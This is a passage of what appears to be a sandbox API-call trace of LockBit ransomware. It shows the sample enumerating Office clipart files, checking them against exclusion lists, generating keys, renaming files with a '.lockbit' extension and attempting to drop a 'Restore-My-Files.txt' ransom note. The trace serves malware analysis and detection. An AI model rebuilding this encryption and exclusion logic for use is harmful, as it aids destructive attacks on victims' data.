1 [0122.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.510] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.515] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.515] malloc (_Size=0xa6) returned 0x77d7a8 [0122.515] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0122.519] free (_Block=0x77d7a8) [0122.519] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.519] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.519] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x1846, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099174.WMF", cAlternateFileName="")) returned 1 [0122.519] lstrcmpiW (lpString1=".", lpString2="J0099174.WMF") returned -1 [0122.519] lstrcmpiW (lpString1="..", lpString2="J0099174.WMF") returned -1 [0122.519] PathFindExtensionW (pszPath="J0099174.WMF") returned=".WMF" [0122.519] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.519] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.519] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.519] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.520] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.521] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.521] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099174.WMF") returned 1 [0122.521] lstrcmpiW (lpString1="ntldr", lpString2="J0099174.WMF") returned 1 [0122.521] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099174.WMF") returned 1 [0122.522] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099174.WMF") returned -1 [0122.522] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099174.WMF") returned -1 [0122.522] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099174.WMF") returned 1 [0122.522] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099174.WMF") returned -1 [0122.522] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.522] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned=".WMF" [0122.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.522] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.522] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.523] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.523] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF.lockbit") returned 72 [0122.523] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.524] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.524] malloc (_Size=0x40068) returned 0x3df0008 [0122.524] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6214) returned 1 [0122.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.525] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.526] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.543] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.543] malloc (_Size=0xa6) returned 0x77d7a8 [0122.543] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0122.546] free (_Block=0x77d7a8) [0122.546] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.546] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.546] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x2610, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099175.WMF", cAlternateFileName="")) returned 1 [0122.546] lstrcmpiW (lpString1=".", lpString2="J0099175.WMF") returned -1 [0122.546] lstrcmpiW (lpString1="..", lpString2="J0099175.WMF") returned -1 [0122.546] PathFindExtensionW (pszPath="J0099175.WMF") returned=".WMF" [0122.547] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.547] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.548] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.548] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099175.WMF") returned 1 [0122.548] lstrcmpiW (lpString1="ntldr", lpString2="J0099175.WMF") returned 1 [0122.548] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099175.WMF") returned 1 [0122.549] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099175.WMF") returned -1 [0122.549] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099175.WMF") returned -1 [0122.549] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099175.WMF") returned 1 [0122.549] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099175.WMF") returned -1 [0122.549] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.549] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF") returned=".WMF" [0122.549] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.549] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.549] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.550] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.550] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF.lockbit") returned 72 [0122.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.552] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.552] malloc (_Size=0x40068) returned 0x3df0008 [0122.552] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9744) returned 1 [0122.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.553] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.559] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.559] malloc (_Size=0xa6) returned 0x77d7a8 [0122.559] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0122.571] free (_Block=0x77d7a8) [0122.571] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.571] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.571] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.571] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099176.WMF", cAlternateFileName="")) returned 1 [0122.572] lstrcmpiW (lpString1=".", lpString2="J0099176.WMF") returned -1 [0122.572] lstrcmpiW (lpString1="..", lpString2="J0099176.WMF") returned -1 [0122.572] PathFindExtensionW (pszPath="J0099176.WMF") returned=".WMF" [0122.572] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.572] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.573] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.573] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".lockbit", 